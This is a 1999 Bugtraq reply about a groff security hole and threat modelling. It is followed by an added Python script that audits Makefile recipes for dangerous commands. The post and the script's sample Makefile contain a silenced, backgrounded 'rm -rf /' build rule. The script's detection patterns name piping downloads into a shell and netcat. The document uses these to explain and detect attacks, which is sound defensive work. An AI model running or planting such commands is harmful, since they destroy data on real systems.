Bugtraq mailing list archives
Re: Groff dangerous (was Re: Troff dangerous.)
From: kragen () POBOX COM (Kragen Sitaker)
Date: Mon, 26 Jul 1999 22:55:36 -0400
Someone writes:
> The trick is that it can get you if you as a system administrator download some open source program from the Internet, and build and install that program; such activity often happens as "root", so a couple of scenarios are possible:
In most cases, this is a non-problem. The reason this is a non-problem is that, for this to be a threat, your "open source program from the Internet" [sic] has to have been packaged by a malicious person who wants to crack your system. But if this is part of your threat model, you won't be safe if you fix groff, because you're executing the makefile supplied by the malicious attacker, which may say

x.o: x.c x.h
	@/bin/rm -rf / &
	$(CC) $(CFLAGS) x.c -o $@

There might be a case where the scenario you described *is* a problem: where the program in question is never going to be executed as root, and the Makefile has been carefully reviewed, but the source and man pages haven't been. In this case, though, I'd probably just read the makefile and install things by hand with cp. :)

There should be a common one-or-two-word name for this kind of non-problem; there are some vivid metaphors for trying to solve it in the literature. (Bruce Schneier's example of planting a big thick stake in front of your house in hopes thieves will run into it is one.)

You *must* be clear about your threat model -- i.e. what threats you're trying to defend against -- before you can decide what is and isn't a security problem.

(BTW, this groff problem doesn't surprise me much. For a while, I had a special email address you could send nroff-source man pages to and get back formatted PostScript from on my home machine, as a convenience when I was at work on Solaris machines without a decent groff. I didn't tell anybody about it until after I disabled it, because I assumed there were probably security holes in groff; it wasn't written to serve as a security gatekeeper, and a useful rule of thumb is that such programs are not very good at security-boundary maintenance, because it requires a different mindset from regular programming. See http://www.pobox.com/~kragen/security-holes.html for thoughts on this situation and mailto:kragen-hacks-get.19 () kragen dnaco net for the code that made the manpage-to-PostScript converter work.)

-- 
<kragen () pobox com> Kragen Sitaker <http://www.pobox.com/~kragen/>
103 days until the Internet stock bubble bursts on Monday, 1999-11-08.
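The message's point is that a Makefile run as root is arbitrary code, and its advice is to read the makefile before running it. As an added example (not code from the original post, nor from groff or make), the following Python script does that reading mechanically: it walks each rule's recipe, splits off make's recipe prefixes, notes which commands are silenced with `@` (so they never appear in the build output) or backgrounded with `&` (so the compile step still succeeds), and flags destructive commands. The sample Makefile is constructed for illustration and reproduces the shape of the rule quoted above; the suspicious-pattern list is illustrative, not exhaustive.

```python
"""Audit the recipe lines of a Makefile before running it as root.

Added example (not code from the original post or from groff/make). It
walks the rule recipes the way a reviewer reading the file by hand
would: stripping make's recipe prefixes, noting which commands are
silenced (@) or backgrounded (&), and flagging destructive commands.
"""
import re

# Constructed sample Makefile for illustration, not from a real project.
# It reproduces the shape of the rule in the post: a silenced,
# backgrounded delete hidden in front of the real compile step.
SAMPLE_MAKEFILE = """\
CC = cc
CFLAGS = -O2

all: x.o

x.o: x.c x.h
\t@/bin/rm -rf / &
\t$(CC) $(CFLAGS) -c x.c -o $@

install: all
\tcp x.o /usr/local/lib/
"""

# Rule lines look like "target: prereqs"; assignments ("CC = cc",
# "CFLAGS := -O2") are excluded by forbidding '=' before and after ':'.
RULE_RE = re.compile(r"^([^\t#][^:=]*?)\s*:(?!=)")

# A single '&' that is not '&&' and not a redirection such as 2>&1 or &>.
BACKGROUND_RE = re.compile(r"(?<![&>|])&(?![&>])")

# Deliberately conservative, illustrative patterns; extend for your tree.
SUSPICIOUS = [
    (re.compile(r"\brm\s+(?:-\S+\s+)+/\*?(?:\s|$)"), "deletes /"),
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b"),
     "pipes a download into a shell"),
    (re.compile(r"\bchmod\s+(?:[ugoa]*\+\S*s|[0-7]?[4-7][0-7]{3}\b)"),
     "sets setuid/setgid"),
    (re.compile(r"\b(?:nc|netcat|ncat)\b"), "opens a network connection"),
]


def parse_recipes(text):
    """Return [(target, [(prefixes, command), ...])] in file order.

    Recipe lines are tab-indented lines following a rule line.  The
    prefix characters '@' (do not echo), '-' (ignore errors) and '+'
    (run even under make -n) are split off and returned separately.
    """
    rules = []
    for raw in text.splitlines():
        if raw.startswith("\t"):
            if not rules:
                continue  # recipe line before any rule; make would reject it
            body = raw[1:].lstrip()
            prefixes = ""
            while body and body[0] in "@-+":
                prefixes += body[0]
                body = body[1:].lstrip()
            if body:
                rules[-1][1].append((prefixes, body))
            continue
        m = RULE_RE.match(raw)
        if m:
            rules.append((m.group(1).strip(), []))
    return rules


def audit(text):
    """Return one finding per recipe command matching SUSPICIOUS."""
    findings = []
    for target, recipe in parse_recipes(text):
        for prefixes, cmd in recipe:
            reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
            if reasons:
                findings.append({
                    "target": target,
                    "command": cmd,
                    # '@' means make never echoes the command to the build log
                    "silenced": "@" in prefixes,
                    # a trailing '&' lets the compile step run and succeed anyway
                    "backgrounded": bool(BACKGROUND_RE.search(cmd)),
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_MAKEFILE):
        flags = []
        if f["silenced"]:
            flags.append("not echoed by make")
        if f["backgrounded"]:
            flags.append("runs in background, build continues")
        print(f"{f['target']}: {f['command']!r}: {', '.join(f['reasons'])}"
              + (f" [{'; '.join(flags)}]" if flags else ""))
```

Reading the file rather than relying on a dry run matters: GNU make's `-n` prints recipes without executing them, but it still runs recipe lines that begin with `+` or contain `$(MAKE)`, so a dry run of a hostile Makefile is not safe either. Either way, the reviewer's real decision is the one the message makes: if the threat model includes a malicious packager, no fix to groff changes the answer, and the Makefile (and anything it invokes) is the code you are actually trusting.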